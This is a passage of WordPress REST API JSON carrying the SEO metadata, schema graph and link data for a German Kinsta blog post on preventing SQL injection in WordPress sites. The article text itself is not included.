name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Shaumik Daityari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"11\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\"},\"author\":{\"name\":\"Shaumik Daityari\",\"@id\":\"https:\/\/kinsta.com\/de\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\"},\"headline\":\"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer\",\"datePublished\":\"2023-10-20T00:26:59+00:00\",\"dateModified\":\"2023-10-23T12:39:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\"},\"wordCount\":2520,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/de\/#organization\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg\",\"keywords\":[\"sitesecurity\",\"wordpresshack\"],\"articleSection\":[\"WordPress Sicherheit\"],\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\",\"url\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\",\"name\":\"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer - Kinsta\u00ae\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/de\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg\",\"datePublished\":\"2023-10-20T00:26:59+00:00\",\"dateModified\":\"2023-10-23T12:39:15+00:00\",\"description\":\"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.\",\"breadcrumb\":{\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage\",\"url\":\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg\",\"contentUrl\":\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg\",\"width\":1460,\"height\":730,\"caption\":\"SQL Injection\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/kinsta.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress Entwicklung\",\"item\":\"https:\/\/kinsta.com\/de\/thema\/wordpress-entwicklung\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kinsta.com\/de\/#website\",\"url\":\"https:\/\/kinsta.com\/de\/\",\"name\":\"Kinsta\u00ae\",\"description\":\"Schnelle, sichere und hochwertige Hosting-L\u00f6sungen\",\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/de\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kinsta.com\/de\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kinsta.com\/de\/#organization\",\"name\":\"Kinsta\",\"url\":\"https:\/\/kinsta.com\/de\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/kinsta.com\/de\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2023\/12\/kinsta-logo.jpeg\",\"contentUrl\":\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2023\/12\/kinsta-logo.jpeg\",\"width\":500,\"height\":500,\"caption\":\"Kinsta\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/de\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Kinsta-Deutschland-207459890108303\/\",\"https:\/\/x.com\/Kinsta_DE\",\"https:\/\/www.instagram.com\/kinstahosting\/\",\"https:\/\/www.linkedin.com\/company\/kinsta\/\",\"https:\/\/www.pinterest.com\/kinstahosting\/\",\"https:\/\/www.youtube.com\/c\/Kinsta\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kinsta.com\/de\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\",\"name\":\"Shaumik Daityari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/kinsta.com\/de\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"caption\":\"Shaumik Daityari\"},\"description\":\"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!\",\"url\":\"https:\/\/kinsta.com\/de\/blog\/author\/shaumikdaityari\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer - Kinsta\u00ae","description":"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/","og_locale":"de_DE","og_type":"article","og_title":"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer","og_description":"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.","og_url":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/","og_site_name":"Kinsta\u00ae","article_publisher":"https:\/\/www.facebook.com\/Kinsta-Deutschland-207459890108303\/","article_published_time":"2023-10-20T00:26:59+00:00","article_modified_time":"2023-10-23T12:39:15+00:00","og_image":[{"width":1460,"height":730,"url":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg","type":"image\/jpeg"}],"author":"Shaumik Daityari","twitter_card":"summary_large_image","twitter_description":"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.","twitter_image":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg","twitter_creator":"@Kinsta_DE","twitter_site":"@Kinsta_DE","twitter_misc":{"Verfasst von":"Shaumik Daityari","Gesch\u00e4tzte Lesezeit":"11\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#article","isPartOf":{"@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/"},"author":{"name":"Shaumik Daityari","@id":"https:\/\/kinsta.com\/de\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036"},"headline":"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer","datePublished":"2023-10-20T00:26:59+00:00","dateModified":"2023-10-23T12:39:15+00:00","mainEntityOfPage":{"@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/"},"wordCount":2520,"commentCount":0,"publisher":{"@id":"https:\/\/kinsta.com\/de\/#organization"},"image":{"@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg","keywords":["sitesecurity","wordpresshack"],"articleSection":["WordPress Sicherheit"],"inLanguage":"de","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kinsta.com\/de\/blog\/sql-injection\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/","url":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/","name":"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer - Kinsta\u00ae","isPartOf":{"@id":"https:\/\/kinsta.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage"},"image":{"@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg","datePublished":"2023-10-20T00:26:59+00:00","dateModified":"2023-10-23T12:39:15+00:00","description":"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.","breadcrumb":{"@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kinsta.com\/de\/blog\/sql-injection\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#primaryimage","url":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg","contentUrl":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg","width":1460,"height":730,"caption":"SQL Injection"},{"@type":"BreadcrumbList","@id":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/kinsta.com\/de\/"},{"@type":"ListItem","position":2,"name":"WordPress Entwicklung","item":"https:\/\/kinsta.com\/de\/thema\/wordpress-entwicklung\/"},{"@type":"ListItem","position":3,"name":"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer"}]},{"@type":"WebSite","@id":"https:\/\/kinsta.com\/de\/#website","url":"https:\/\/kinsta.com\/de\/","name":"Kinsta\u00ae","description":"Schnelle, sichere und hochwertige Hosting-L\u00f6sungen","publisher":{"@id":"https:\/\/kinsta.com\/de\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kinsta.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/kinsta.com\/de\/#organization","name":"Kinsta","url":"https:\/\/kinsta.com\/de\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/kinsta.com\/de\/#\/schema\/logo\/image\/","url":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2023\/12\/kinsta-logo.jpeg","contentUrl":"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2023\/12\/kinsta-logo.jpeg","width":500,"height":500,"caption":"Kinsta"},"image":{"@id":"https:\/\/kinsta.com\/de\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Kinsta-Deutschland-207459890108303\/","https:\/\/x.com\/Kinsta_DE","https:\/\/www.instagram.com\/kinstahosting\/","https:\/\/www.linkedin.com\/company\/kinsta\/","https:\/\/www.pinterest.com\/kinstahosting\/","https:\/\/www.youtube.com\/c\/Kinsta"]},{"@type":"Person","@id":"https:\/\/kinsta.com\/de\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036","name":"Shaumik Daityari","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/kinsta.com\/de\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","caption":"Shaumik Daityari"},"description":"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!","url":"https:\/\/kinsta.com\/de\/blog\/author\/shaumikdaityari\/"}]}},"acf":[],"_links":{"self":[{"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/posts\/31455","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/comments?post=31455"}],"version-history":[{"count":9,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/posts\/31455\/revisions"}],"predecessor-version":[{"id":66569,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/posts\/31455\/revisions\/66569"}],"alternate":[{"embeddable":true,"hreflang":"en","title":"English","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/en"},{"embeddable":true,"hreflang":"fr","title":"French","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/fr"},{"embeddable":true,"hreflang":"es","title":"Spanish","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/es"},{"embeddable":true,"hreflang":"pt","title":"Portuguese","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/pt"},{"embeddable":true,"hreflang":"it","title":"Italian","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/it"},{"embeddable":true,"hreflang":"da","title":"Danish","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/dk"},{"embeddable":true,"hreflang":"nl","title":"Dutch","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/nl"},{"embeddable":true,"hreflang":"de","title":"German","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/de"},{"embeddable":true,"hreflang":"sv","title":"Swedish","href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/translations\/se"},{"href":"https:\/\/kinsta.com\/de\/wp-json\/kinsta\/v1\/posts\/31455\/tree"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/media\/31469"}],"wp:attachment":[{"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/media?parent=31455"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/tags?post=31455"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/kinsta.com\/de\/wp-json\/wp\/v2\/topic?post=31455"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}